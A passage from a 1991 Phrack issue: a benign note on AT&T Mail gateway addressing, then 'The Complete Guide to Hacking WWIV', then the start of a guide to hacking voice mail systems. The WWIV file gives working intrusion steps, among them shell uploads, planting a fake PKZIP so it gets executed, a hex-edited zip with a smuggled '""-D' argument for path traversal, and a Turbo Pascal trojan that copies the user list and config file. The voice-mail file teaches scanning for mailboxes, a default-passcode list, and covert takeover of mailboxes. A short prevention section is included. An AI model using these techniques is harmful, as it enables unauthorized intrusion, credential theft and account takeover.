  715.                 Volume Three, Issue Thirty-four, File #4 of 11
  716.                             _______________________
  717.                           ||                       ||
  718.                           || The AT&T Mail Gateway ||
  719.                           ||                       ||
  720.                           ||   December 19, 1990   ||
  721.                           ||                       ||
  722.                           ||    by Robert Alien    ||
  723.                           ||_______________________||
  724.  
  725. The Internet Gateway
  726. ~~~~~~~~~~~~~~~~~~~
  727. The Internet Gateway provides Internet e-mail users with a method of
  728. communication to AT&T Mail.  The Interconnect consists of various private
  729. email networks and uses an addressing format better know as Domain Addressing
  730. Service (DAS).
  731.  
  732. A domain address consists of a user name, followed by an @ sign and/or % sign
  733. and a domain name, which is usually the system name.
  734.  
  735. Example:
  736.  
  737.         jdoe@attmail.com
  738.  
  739. Sending Email to Internet Users
  740. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  741. To send email from the AT&T MailService to the Internet community use the UUCP
  742. addressing style.
  743.  
  744. Example:
  745.  
  746.         internet!system.domain!username
  747.  
  748. Translates to:
  749.  
  750.         internet!gnu.ai.mit.edu!jdoe
  751.  
  752. If you are sending e-mail to an Internet user whose e-mail address may be in
  753. the RFC 822 format (user@domain), you must translate the RFC address before
  754. sending your message to an Internet recipient.
  755.  
  756.         username@system.domain (Internet user's address)
  757.  
  758.         internet!system.domain!username (to a UUCP address)
  759.  
  760. Example:
  761.         username%system2@system.domain (Internet user's address)
  762.  
  763. Translates to:
  764.         internet!system.domain!system2!username
  765.  
  766. Sending Email From The Internet
  767. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  768. To send email to the AT&T Mail Service, Internet users can choose either the
  769. RFC 822 or UUCP addressing style.  The Internet recognizes attmail.com as the
  770. domain identifier for AT&T Mail when electronic messages are sent through the
  771. gateway.  Although many Internet users choose to send e-mail using the RFC 822
  772. addressing style, the UUCP style is also available on many UNIX systems on the
  773. Internet, but not every system supports UUCP.  Below are examples of both
  774. addressing styles:
  775.  
  776. RFC 822 Addressing: username@attmail.com
  777.  
  778. Example:
  779.  
  780.         jsmith@attmail.com
  781.  
  782. UUCP Addressing: attmail.com!username
  783.  
  784. Example:
  785.  
  786.         attmail.com!jdoe
  787.  
  788. Although email can be sent through the Internet gateway, surcharged services,
  789. such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages
  790. destined to other ADMDs connected to AT&T Mail are not deliverable.  If you are
  791. an Internet e-mail user attempting to use a surcharged service and are not
  792. registered on AT&T Mail, you will not be able to send your message, and will be
  793. automatically notified.  Below is a list of surcharged services that are
  794. unavailable to Internet users.
  795.  
  796. *  FAX
  797. *  Telex
  798. *  COD
  799. *  U.S. Mail
  800. *  Overnight
  801. *  Administrative Management Domain (ADMD) Messages
  802.  
  803. Sending Email to Bitnet Users
  804. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  805. To send email to BITNET users from AT&T Mail, enter:
  806.  
  807.         internet!host.bitnet!user
  808.  
  809. Sending Email to UUNET Users
  810. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  811. To send email to UUNET users from AT&T Mail via the Internet Gateway, enter:
  812.  
  813.         attmail!internet!uunet!system!user
  814.  
  815. Internet Restrictions
  816. ~~~~~~~~~~~~~~~~~~~~
  817. The following commercial restrictions apply to the use of the Internet Gateway.
  818.  
  819. *  Users are prohibited to use the Internet to carry traffic between commercial
  820.    (for profit) electronic messaging systems.
  821.  
  822. *  Advertising and soliciting i.e., messages offering goods or services for sale
  823.    or offers of jobs.
  824.  
  825. *  Provision of for-profit service, other than electronic messaging to Internet
  826.    users, is permitted (e.g., database services) if such service is used for
  827.    scholarly research purposes and its costs are borne by individual or
  828.    institutional subscription.
  829. _______________________________________________________________________________
  830.  
  831.  
  832.                                 ==Phrack Inc.==
  833.  
  834.                 Volume Three, Issue Thirty-four, File #5 of 11
  835.  
  836.                           ***                    ***
  837.                           ***                    ***
  838.                           *** The Complete Guide ***
  839.                           ***  to Hacking WWIV   ***
  840.                           ***                    ***
  841.                           ***     by Inhuman     ***
  842.                           ***   September 1991   ***
  843.                           ***                    ***
  844.                           ***                    ***
  845.  
  846.      WWIV is one of the most popular BBS programs in the country.  With
  847. thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a
  848. lot of support and community.  The nice thing about WWIV is that it is very
  849. easy to set up.  This makes it popular among the younger crowd of sysops who
  850. can't comprehend the complexities of fossil drivers and batch files.  In this
  851. file, I will discuss four methods of hacking WWIV to achieve sysop access and
  852. steal the user and configuration files.  Just remember the number one rule
  853. of hacking: Don't destroy, alter, or create files on someone else's computer,
  854. unless it's to cover your own trail.  Believe me, there is nothing lower than
  855. the scum who hack BBSes for the sheer pleasure of formatting someone else's
  856. hard drive.  But there is nothing wrong (except legally) with hacking a system
  857. to look at the sysop's files, get phone numbers, accounts, etc.  Good luck.
  858.  
  859. ***
  860. *** Technique #1: The Wildcard Upload
  861. ***
  862.  
  863.      This technique will only work on a board running an unregistered
  864. old version of DSZ and a version of WWIV previous to v4.12.  It is all
  865. based on the fact that if you do a wildcard upload (*.*), whatever file you
  866. upload will go into the same directory as DSZ.COM, which is often the main BBS
  867. directory.  So there are several methods of hacking using this technique.
  868.  
  869.      If the sysop is running an unmodified version of WWIV, you can simply
  870. compile a modded version of it with a backdoor and overwrite his copy.  Your
  871. new copy will not be loaded into memory until the BBS either shrinks out (by
  872. running an onliner or something), or the sysop terminates the BBS and runs it
  873. again.
  874.  
  875.      You can also have some fun with two strings that WWIV always recognizes at
  876. the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!".  The first is used by
  877. WWIVnet to tell the BBS that it is receiving a net call.  If the BBS is part of
  878. a network and you type "!@-NETWORK-@!", it will then wait for the network
  879. password and other data.  If the board is not part of a network, it will just
  880. act like you typed an invalid user name.  The second string is reserved for
  881. whatever programs people wanted to write for WWIV, like an off-line reader or
  882. whatever.  Snarf (the file leeching utility) uses this.  If there is not a
  883. REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you
  884. entered an invalid user name.  So, what you can do is wildcard upload either
  885. REMOTE.COM or NETWORK.COM.  You want to call them COM files, because if the EXE
  886. files already exist, the COM ones will be called first.  If the BBS is part of
  887. a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will
  888. screw up network communications and the sysop will notice a lot faster.  Of
  889. course, if you're going straight in for the kill, it doesn't matter.
  890.  
  891.      So, what should NETWORK.COM or REMOTE.COM actually be? you ask.  Well, you
  892. can try renaming COMMAND.COM to one of those two, which would make a DOS shell
  893. for you when it was executed.  This is tricky, though, because you need to know
  894. his DOS version.  I suggest a batch file, compiled to a COM file using PC Mag's
  895. BAT2EXEC.  You can make the batch file have one line:
  896.  
  897. \COMMAND
  898.  
  899.      That way you don't have to worry about DOS versions.
  900.  
  901.      Remember that this method of hacking WWIV is almost completely obsolete.
  902. It is just included for reference, or for some old board run from an empty
  903. house where the sysop logs on twice a year or something.
  904.  
  905. ***
  906. *** Technique #2: The PKZIP Archive Hack
  907. ***
  908.  
  909.      Probably the most vulnerable part of WWIV is the archive section.  This
  910. section allows users to unZIP files to a temporary directory and ZIP the files
  911. you want into a temporary ZIP file, then download it.  This is useful if you
  912. download a file from another board, but one file in it is corrupted.  This way
  913. you don't have to re-download the whole file.  Anyway, on with the show.  Make
  914. a zip file that contains a file called PKZIP.BAT or COM or EXE.  It doesn't
  915. matter.  This file will be executed, so make it whatever you want, just like in
  916. Technique #1.  Make it COMMAND.COM, or a batch file, or a HD destroyer,
  917. whatever you want.  So you upload this file, and then type "E" to extract it.
  918.  
  919. It'll ask you what file to extract and you say the name of the file you just
  920. uploaded.  It'll then say "Extract What? " and you say "*.*".  It'll then unzip
  921. everything (your one file) into the TEMP directory.  Then go to the archive
  922. menu ("G") and pick "A" to add a file to archive.  It'll ask what file you want
  923. to add, and say anything, it doesn't matter.  At this point it will try to
  924. execute the command:
  925.  
  926. PKZIP TEMP.ZIP \TEMP\%1
  927.  
  928.      Where %1 is what you just entered.  The file pointer is already pointing
  929. to the temp directory, so instead of executing PKZIP from the DOS path, it'll
  930. execute the file sitting in the current directory, TEMP.  So then it runs PKZIP
  931. and you get your DOS shell or whatever.
  932.      If PKZIP does not work, you may want to try uploading another file, and
  933. use the same technique, but instead make it an ARC file and call the file in
  934. the archive PKPAK.
  935.  
  936.      This technique is relatively easy to defeat from the sysop's end, but
  937. often they are too lazy, or just haven't heard about it.
  938.  
  939. ***
  940. *** Technique #3: The -D Archive Hack
  941. ***
  942.  
  943.      This technique also plays on the openness of WWIV's archive system.  This
  944. is another method of getting a file into the root BBS directory, or anywhere on
  945. the hard drive, for that matter.
  946.  
  947.      First, create a temporary directory on your hard drive.  It doesn't matter
  948. what it's called.  We'll call it TEMP.  Then, make a sub-directory of TEMP
  949. called AA. It can actually be called any two-character combination, but we'll
  950. keep it nice and simple.  Then make a subdirectory of AA called WWIV.
  951.  
  952.      Place NETWORK.COM or REMOTE.COM or whatever in the directory
  953. \TEMP\AA\WWIV.  Then from the TEMP directory execute the command:
  954.  
  955. PKZIP -r -P STUFF.ZIP         <--- The case of "r" and "P" are important.
  956.  
  957.      This will create a zip file of all the contents of the directories, but
  958. with all of the directory names recursed and stored.  So if you do a PKZIP -V
  959. to list the files you should see AA\WWIV\REMOTE.COM, etc.
  960.  
  961.      Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search
  962. for "AA".  When you find it (it should occur twice), change it to "C:".  It is
  963. probably a good idea to do this twice, once with the subdirectory called WWIV,
  964. and another with it called BBS, since those are the two most common main BBS
  965. directory names for WWIV.  You may even want to try D: or E: in addition to C:.
  966. You could even work backwards, by forgetting the WWIV subdirectory, and just
  967. making it AA\REMOTE.COM, and changing the "AA" to "..".  This would be
  968. foolproof.  You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever.
  969.  
  970.      Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and
  971. type "E" to extract it to a temporary directory.  It'll ask you what file.
  972. Type "STUFF.ZIP".  It'll ask what you want to extract.  Type """-D".  It'll
  973. then execute:
  974.  
  975. PKUNZIP STUFF.ZIP ""-D
  976.  
  977.      It will unzip everything into the proper directory.  Voila.  The quotation
  978. marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check
  979. for the hyphen.  This method can only be defeated by modifying the source code,
  980. or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you
  981. lose your archive section.
  982.  
  983.  
  984.  
  985. ***
  986. *** Technique #4: The Trojan Horse File-Stealer
  987. ***
  988.  
  989.      This method, if executed properly, is almost impossible to defeat, and
  990. will conceivably work on any BBS program, if you know the directory structure
  991. well enough.  Once again, you need PC Mag's BAT2EXEC, or enough programming
  992. experience to write a program that will copy files from one place to another.
  993.      The basic principle is this: You get the sysop to run a program that you
  994. upload.  This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over*
  995. files that already exist in the transfer or gfiles area.  You then go download
  996. those files and you have the two most important files that exist for WWIV.
  997. Now, you need to do a certain amount of guess-work here.  WWIV has it's
  998. directories set up like this:
  999.  
  1000.  
  1001.  
  1002.        --- TEMP
  1003.       I              --- DIR1
  1004.       I             I
  1005.       I--- DLOADS---I--- DIR2
  1006.       I             I
  1007.       I              --- DIR3
  1008. WWIV--I--- DATA
  1009.       I              --- GDIR1
  1010.       I             I
  1011.       I--- GFILES---I--- GDIR2
  1012.       I             I
  1013.       I              --- GDIR3
  1014.        --- MSGS
  1015.  
  1016.  
  1017.      The sysop sets the names for the DIR1, DIR2, etc.  Often you have names
  1018. like UPLOADS, GAMES, UTILS, etc.  For the gfile dirs you might have GENERAL,
  1019. HUMOR, whatever.
  1020.  
  1021.      So you have to make a guess at the sysop's directory names.  Let's say he
  1022. never moves his files from the upload directory.  Then do a directory list from
  1023. the transfer menu and pick two files that you don't think anyone will download.
  1024. Let's say you see:
  1025.  
  1026. RABBIT  .ZIP 164k : The History of Rabbits from Europe to the U.S.
  1027. SCD     .COM  12k : SuperCD - changes dirs 3% faster than DOS's CD!
  1028.  
  1029.      So you then might write a batch file like this:
  1030.  
  1031. @ECHO OFF
  1032. COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP
  1033. COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP
  1034. COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM
  1035. COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM
  1036.  
  1037.      You'd then compile it to a COM file and upload it to the sysop directory.
  1038. Obviously this file is going to be pretty small, so you have to make up
  1039. plausible use for it.  You could say it's an ANSI screen for your private BBS,
  1040. and the sysop is invited.  This is good if you have a fake account as the
  1041. president of some big cracking group.  You wouldn't believe how gullible some
  1042. sysops are.  At any rate, use your imagination to get him to run the file.  And
  1043. make it sound like he shouldn't distribute it, so he won't put it in some
  1044. public access directory.
  1045.  
  1046.      There is a problem with simply using a batch file.  The output will look
  1047. like:
  1048.  
  1049. 1 file(s) copied.
  1050. File not found.
  1051. 1 file(s) copied.
  1052. File not found.
  1053.  
  1054.      That might get him curious enough to look at it with a hex editor, which
  1055. would probably blow everything.  That's why it's better to write a program in
  1056. your favorite language to do this.  Here is a program that searches specified
  1057. drives and directories for CONFIG.DAT and USER.LST and copies them over the
  1058. files of your choice.  It was written in Turbo Pascal v5.5:
  1059.  
  1060. Program CopyThisOverThat;
  1061.  
  1062. { Change the dir names to whatever you want.  If you change the number of
  1063.   locations it checks, be sure to change the "num" constants as well  }
  1064.  
  1065. uses dos;
  1066.  
  1067. const
  1068.    NumMainDirs = 5;
  1069.    MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD',
  1070.       'BOARD','WAR');
  1071.    NumGfDirs = 3;
  1072.    GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS');
  1073.    NumSubGFDirs = 2;
  1074.    SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC');
  1075.  
  1076.    NumDirsToTest = 3;
  1077.    DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\');
  1078.    {ok to test for one that doesn't exist}
  1079.  
  1080.    {Source file names include paths from the MAIN BBS subdir (e.g. "BBS")  }
  1081.  
  1082.    SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA
  1083. T');
  1084.  
  1085.    { Dest file names are from subgfdirs }
  1086.  
  1087.    DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP');
  1088.  
  1089. var
  1090.    p, q, r, x, y, dirN: byte;
  1091.    bigs: word;
  1092.    CurDir, BackDir: string[80];
  1093.    f1, f2: file;
  1094.    Info: pointer;
  1095.    ok: boolean;
  1096.  
  1097. Procedure Sorry;
  1098.  
  1099. var
  1100.    x, y: integer;
  1101. begin
  1102. for y := 1 to 1000 do
  1103.    for x := 1 to 100 do
  1104.       ;
  1105. Writeln;
  1106. Writeln ('<THIS IS DISPLAYED WHEN FINISHED>');  {change to something like }
  1107. Writeln;                                        {Abnormal program termination}
  1108. ChDir(BackDir);
  1109. Halt;
  1110. end;
  1111.  
  1112. begin
  1113.  
  1114. Write ('<THIS IS DISPLAYED WHILE SEARCHING>'); {change to something like }
  1115.  
  1116. {$I-}                                          {Loading...}
  1117.  
  1118. GetDir (0, BackDir);
  1119. ChDir('\');
  1120. for dirn := 1 to NumDirsToTest do
  1121.    begin
  1122.    ChDir(DirsToTest[dirn]);
  1123.    if IOResult = 0 then
  1124.       begin
  1125.       for p := 1 to NumMainDirs do
  1126.          begin
  1127.          ChDir (MainDirs[p]);
  1128.          if (IOResult <> 0) then
  1129.             begin
  1130.             if (p = NumMainDirs) and (dirn = NumDirsToTest) then
  1131.                Sorry;
  1132.             end else begin
  1133.             p := NumMainDirs;
  1134.             for q := 1 to NumGFDirs do
  1135.                begin
  1136.                ChDir (GFDirs[q]);
  1137.                if (IOResult <> 0) then
  1138.                   begin
  1139.                   if (q = NumGFDirs) and (dirn=NumdirsToTest) then
  1140.                      Sorry;
  1141.                   end else begin
  1142.                   q := NumGFDirs;
  1143.                   for r := 1 to NumSubGFDirs do
  1144.                      begin
  1145.                      ChDir (SubGFDirs[r]);
  1146.                      if (IOResult <> 0) then
  1147.                         begin
  1148.                         if r = NumSubGFDirs then
  1149.                            Sorry;
  1150.                         end else begin
  1151.                         r := NumSubGFDirs;
  1152.                         dirn := NumDirsToTest;
  1153.                         ok := true;
  1154.                         end;
  1155.                      end;
  1156.                   end;
  1157.                end;
  1158.             end;
  1159.          end;
  1160.       end;
  1161.    end;
  1162. GetDir (0, CurDir);
  1163. ChDir ('..');
  1164. ChDir ('..');
  1165. for x := 1 to 2 do
  1166.    begin
  1167.    Assign (f1, SourceFileNames[x]);
  1168.    Assign (f2, CurDir+DestFileNames[x]);
  1169.    Reset (f1, 1);
  1170.    if IOResult <> 0 then
  1171.       begin
  1172.       if x = 2 then
  1173.          Sorry;
  1174.       end else begin
  1175.       ReWrite (f2, 1);
  1176.       Bigs := FileSize(f1);
  1177.       GetMem(Info, Bigs);
  1178.       BlockRead(f1, Info^, Bigs);
  1179.       BlockWrite (f2, Info^, Bigs);
  1180.       FreeMem(Info, Bigs);
  1181.       end;
  1182.    end;
  1183. Sorry;
  1184. end.
  1185.  
  1186.      So hopefully the sysop runs this program and emails you with something
  1187. like "Hey it didn't work bozo!".  Or you could make it work.  You could
  1188. actually stick a BBS ad in the program or whatever.  It's up to you.  At any
  1189. rate, now you go download those files that it copied the USER.LST and
  1190. CONFIG.DAT over.  You can type out the CONFIG.DAT and the first word you see in
  1191. all caps is the system password.  There are several utilities for WWIV that let
  1192. you compile the USER.LST to a text file.  You can find something like that on a
  1193. big WWIV board, or you can try to figure it out with a text or hex editor.  At
  1194. any rate, once you have those two files, you're in good shape.
  1195.  
  1196.      You could also use a batch file like that in place of one that calls
  1197. COMMAND.COM for something like REMOTE.COM.  It's up to you.
  1198.  
  1199. ***
  1200. *** Hacking Prevention
  1201. ***
  1202.  
  1203.      So you are the sysop of a WWIV board, and are reading this file with
  1204. growing dismay.  Have no fear, if you have patience, almost all of these
  1205. methods can be fixed.
  1206.  
  1207.      To eliminate the wildcard upload, all you have to do it get a current copy
  1208. of WWIV (4.20), and the latest version of DSZ.  It's all been fixed.  To fix
  1209. the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP,
  1210. PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have.  So your
  1211. command lines should look like:
  1212.  
  1213. \DOS\PKZIP -V %1
  1214.  
  1215.      Or something similar.  That will fix that nicely.  To eliminate the -D
  1216. method, you have to make some modifications to the source code if you want to
  1217. keep your archive section.  Goose, sysop of the Twilight Zone BBS in VA,
  1218. puts out a NOHACK mod, which is updated regularly.  It fixes ALL of these
  1219. methods except the last.  The latest version of NOHACK is v2.4.  If you are a
  1220. WWIV sysop, put it in.
  1221.  
  1222.      I can think of two ways to stop the last method, but neither of them are
  1223. easy, and both require source code modifications.  You could keep track of the
  1224. filesize of a file when it's uploaded.  Then when someone goes to download it,
  1225. you could check the actual filesize with the size when it was uploaded.  If
  1226. they differ, it wouldn't let you download it.  You could do the same with the
  1227. date.  Although either method could be gotten around with enough patience.
  1228.  
  1229.      For a virtually unhackable system, voice validate all users, have all
  1230. uploads go to the sysop directory so you can look over them first, and don't
  1231. run any programs.  Of course, this is very tedious, but that is the price
  1232. of a secure BBS.
  1233.  
  1234. ***
  1235. *** Thanks
  1236. ***
  1237.  
  1238.      Thanks to Fenris Wolf for teaching me about the -D method, to Steve
  1239. for help with the CopyThisOverThat program, and to Insight for proofing this
  1240. file.
  1241.  
  1242. *******************************************************************************
  1243.  
  1244.                                 ==Phrack Inc.==
  1245.  
  1246.                 Volume Three, Issue Thirty-four, File #6 of 11
  1247.  
  1248.  
  1249.                            HACKING VOICE MAIL SYSTEMS
  1250.  
  1251.                                by  Night Ranger
  1252.  
  1253.  
  1254. DISCLAIMER
  1255.  
  1256. I, Night Ranger, or anyone else associated with Phrack, am not responsible
  1257. for anything the readers of this text may do.  This file is for informational
  1258. and educational purposes only and should not be used on any system or network
  1259. without written permission of the authorized persons in charge.
  1260.  
  1261.  
  1262. INTRODUCTION
  1263.  
  1264. I decided to write this text file because I received numerous requests for
  1265. vmbs from people.  Vmbs are quite easy to hack, but if one doesn't know where
  1266. to start it can be hard.  Since there aren't any decent text files on this
  1267. subject, I couldn't refer them to read anything, and decided to write one
  1268. myself.  To the best of my knowledge, this is the most complete text on
  1269. hacking vmb systems.  If you have any comments or suggestions, please let me
  1270. know.
  1271.  
  1272. Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in
  1273. touch with each other and share information.  Probably the main reason for
  1274. this is their simplicity and availability.  Anyone can call a vmb regardless
  1275. of their location or computer type.  Vmbs are easily accessible because most
  1276. are toll free numbers, unlike bulletin boards.  Along with their advantages,
  1277. they do have their disadvantages.  Since they are easily accessible this
  1278. means not only hackers and phreaks can get information from them, but feds
  1279. and narcs as well.  Often they do not last longer than a week when taken
  1280. improperly.  After reading this file and practicing the methods described,
  1281. you should be able to hack voice mail systems with ease.  With these thoughts
  1282. in mind, let's get started.
  1283.  
  1284.  
  1285. FINDING A VMB SYSTEM
  1286.  
  1287. The first thing you need to do is find a VIRGIN (unhacked) vmb system.  If
  1288. you hack on a system that already has hackers on it, your chance of finding
  1289. a box is considerably less and it increases the chance that the system
  1290. administrator will find the hacked boxes.  To find a virgin system, you need
  1291. to SCAN some 800 numbers until you find a vmb.  A good idea is to take the
  1292. number of a voice mail system you know, and scan the same exchange but not
  1293. close to the number you have.
  1294.  
  1295.  
  1296. FINDING VALID BOXES ON THE SYSTEM
  1297.  
  1298. If you get a high quality recording (not an answering machine) then it is
  1299. probably a vmb system.  Try entering the number 100, the recording should
  1300. stop.  If it does not, you may have to enter a special key (such as '*' '#'
  1301. '8' or '9') to enter the voice mail system.  After entering 100 it should
  1302. either connect you to something or do nothing.  If it does nothing, keep
  1303. entering (0)'s until it does something.  Count the number of digits you
  1304. entered and this will tell you how many digits the boxes on the system are.
  1305. You should note that many systems can have more than one box length depending
  1306. on the first number you enter, Eg. Boxes starting with a six can be five
  1307. digits while boxes starting with a seven can only be four.  For this file we
  1308. will assume you have found a four digit system, which is pretty common.  It
  1309. should do one of the following things...
  1310.  
  1311. 1)  Give you an error message, Eg. 'Mailbox xxxx is invalid.'
  1312. 2)  Ring the extension and then one of the following..
  1313.     1)  Someone or no one answers.
  1314.     2)  Connects you to a box.
  1315. 3)  Connect you to mailbox xxxx.
  1316.  
  1317. If you get #1 then try some more numbers.  If you get #2 or #3 then you have
  1318. found a valid vmb (or extension in the case of 2-1).  Extensions usually have
  1319. a vmb for when they are not at their extension.  If you get an extension,
  1320. move on.  Where you find one box you will probably find more surrounding it.
  1321. Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers.
  1322. Eg. Boxes would be at 105, 116, 121, ... with none in between.  Some systems
  1323. start boxes at either 10 after a round number or 100 after, depending on
  1324. whether it is a three or four box system.  For example, if you do not find
  1325. any around 100, try 110 and if you do not find any around 1000 try 1100.  The
  1326. only way to be sure is to try EVERY possible box number.  This takes time but
  1327. can be worth it.
  1328.  
  1329. Once you find a valid box (even if you do not know the passcode) there is a
  1330. simple trick to use when scanning for boxes outside of a vmb so that it does
  1331. not disconnect you after three invalid attempts.  What you do is try two box
  1332. numbers and then the third time enter a box number you know is valid.  Then
  1333. abort ( usually by pressing (*) or (#) ) and it will start over again.  From
  1334. there you can keep repeating this until you find a box you can hack on.
  1335.  
  1336.  
  1337. FINDING THE LOGIN SEQUENCE
  1338.  
  1339. Different vmb systems have different login sequences (the way the vmb owner
  1340. gets into his box).  The most common way is to hit the pound (#) key from the
  1341. main menu.  This pound method works on most systems, including Aspens (more
  1342. on specific systems later).  It should respond with something like 'Enter
  1343. your mailbox.' and then 'Enter your passcode.'  Some systems have the
  1344. asterisk (*) key perform this function.  Another login method is hitting a
  1345. special key during the greeting (opening message) of the vmb.  On a Cindy or
  1346. Q Voice Mail system you hit the zero (0) key during the greet and since
  1347. you've already entered your mailbox number it will respond with 'Enter your
  1348. passcode.'  If (0) doesn't do anything try (#) or (*).  These previous two
  1349. methods of login are the most common, but it is possible some systems will
  1350. not respond to these commands.  If this should happen, keep playing around
  1351. with it and trying different keys.   If for some reason you cannot find the
  1352. login sequence, then save this system for later and move on.
  1353.  
  1354.  
  1355. GETTING IN
  1356.  
  1357. This is where the basic hacking skills come to use.  When a system
  1358. administrator creates a box for someone, they use what's called a default
  1359. passcode.  This same code is used for all the new boxes on the system, and
  1360. often on other systems too.  Once the legitimate owner logs into his new vmb,
  1361. they are usually prompted to change the passcode, but not everyone realizes
  1362. that someone will be trying to get into their mailbox and quite a few people
  1363. leave their box with the default passcode or no passcode at all.  You should
  1364. try ALL the defaults I have listed first.
  1365.  
  1366.  
  1367. DEFAULTS           BOX NUMBER      TRY
  1368.  
  1369. box number (bn)    3234            3234        Most Popular
  1370. bn backwards       2351            1532        Popular
  1371. bn+'0'             323             3230        Popular With Aspens
  1372.  
  1373. Some additional defaults in order of most to least common are:
  1374.  
  1375. 4d        5d        6d
  1376. 0000      00000     000000    *MOST POPULAR*
  1377. 9999      99999     999999    *POPULAR*
  1378. 1111      11111     111111    *POPULAR*
  1379. 1234      12345     123456    *VERY POPULAR WITH OWNERS*
  1380. 4321      54321     654321
  1381. 6789      56789     456789
  1382. 9876      98765     987654
  1383. 2222      22222     222222
  1384. 3333      33333     333333
  1385. 4444      44444     444444
  1386. 5555      55555     555555
  1387. 6666      66666     666666
  1388. 7777      77777     777777
  1389. 8888      88888     888888
  1390. 1991
  1391.  
  1392.  
  1393. It is important to try ALL of these before giving up on a system.  If none of
  1394. these defaults work, try anything you think may be their passcode.  Also
  1395. remember that just because the system can have a four digit passcode the vmb
  1396. owner does not have to have use all four digits.  If you still cannot get
  1397. into the box, either the box owner has a good passcode or the system uses a
  1398. different default.  In either case, move on to another box.  If you seem to
  1399. be having no luck, then come back to this system later.  There are so many
  1400. vmb systems you should not spend too much time on one hard system.
  1401.  
  1402. If there's one thing I hate, it's a text file that says 'Hack into the
  1403. system.  Once you get in...' but unlike computer systems, vmb systems really
  1404. are easy to get into.  If you didn't get in, don't give up!  Try another
  1405. system and soon you will be in.  I would say that 90% of all voice mail
  1406. systems have a default listed above.  All you have to do is find a box with
  1407. one of the defaults.
  1408.  
  1409.  
  1410. ONCE YOU'RE IN
  1411.  
  1412. The first thing you should do is listen to the messages in the box, if there
  1413. are any.  Take note of the dates the messages were left.  If they are more
  1414. than four weeks old, then it is pretty safe to assume the owner is not using
  1415. his box.  If there are any recent messages on it, you can assume he is
  1416. currently using his box.  NEVER take a box in use.  It will be deleted soon,
  1417. and will alert the system administrator that people are hacking the system.
  1418. This is the main reason vmb systems either go down, or tighten security.  If
  1419. you take a box that is not being used, it's probable no one will notice for
  1420. quite a while.
  1421.  
  1422.  
  1423. SCANNING BOXES FROM THE INSIDE
  1424.  
  1425. >From the main menu, see if there is an option to either send a message to
  1426. another user or check receipt of a message.  If there is you can search for
  1427. VIRGIN (unused) boxes) without being disconnected like you would from
  1428. outside of a box.  Virgin boxes have a 'generic' greeting and name.  Eg.
  1429. 'Mailbox xxx' or 'Please leave your message for mailbox xxx...'   Write down
  1430. any boxes you find with a generic greeting or name, because they will
  1431. probably have the default passcode.  Another sign of a virgin box is a name
  1432. or greeting like 'This mailbox is for ...' or a women's voice saying a man's
  1433. name and vice versa, which is the system administrator's voice.  If the box
  1434. does not have this feature, simply use the previous method of scanning boxes
  1435. from the outside.  For an example of interior scanning, when inside an Aspen
  1436. box, chose (3) from the main menu to check for receipt.  It will respond with
  1437. 'Enter box number.'  It is a good idea to start at a location you know there
  1438. are boxes present and scan consecutively, noting any boxes with a 'generic'
  1439. greeting.  If you enter an invalid box it will alert you and allow you to
  1440. enter another.  You can enter invalid box numbers forever, instead of the
  1441. usual three incorrect attempts from outside a box.
  1442.  
  1443.  
  1444. TAKING A BOX
  1445.  
  1446. Now you need to find a box you can take over.  NEVER take a box in use; it
  1447. simply won't last.  Deserted boxes (with messages from months ago) are the
  1448. best and last the longest.  Take these first.  New boxes have a chance of
  1449. lasting, but if the person for whom the box was created tries to login,
  1450. you'll probably lose it.  If you find a box with the system administrator's
  1451. voice saying either the greeting or name (quite common), keeping it that way
  1452. will prolong the box life, especially the name.
  1453.  
  1454. This is the most important step in taking over a box!  Once you pick a box take
  1455.  over, watch it for at least three days BEFORE changing anything!  Once
  1456. you think it's not in use, then change only the passcode, nothing else!
  1457. Then login frequently for two to three days to monitor the box and make sure
  1458. no one is leaving messages in it.  Once you are pretty sure it is deserted,
  1459. change your greeting to something like 'Sorry I'm not in right now, please
  1460. leave your name and number and I'll get back to you.'  DO NOT say 'This is
  1461. Night Ranger dudes...' because if someone hears that it's good as gone.  Keep
  1462. your generic greeting for one week.  After that week, if there are no
  1463. messages from legitimate people, you can make your greeting say whatever you
  1464. want.  The whole process of getting a good vmb (that will last) takes about
  1465. 7-10 days, the more time you take the better chance you have of keeping it
  1466. for long time.  If you take it over as soon as you get in, it'll probably
  1467. last you less than a week.  If you follow these instructions, chances are it
  1468. will last for months.  When you take some boxes, do not take too many at one
  1469. time.  You may need some to scan from later.  Plus listening to the messages
  1470. of the legitimate users can supply you with needed information, such as the
  1471. company's name, type of company, security measures, etc.
  1472.  
  1473.  
  1474. SYSTEM IDENTIFICATION
  1475.  
  1476. After you have become familiar with various systems, you will recognize them
  1477. by their characteristic female (or male) voice and will know what defaults
  1478. are most common and what tricks you can use.  The following is a few of a few
  1479. popular vmb systems.
  1480.  
  1481. ASPEN is one of the best vmb systems with the most features.  Many of them
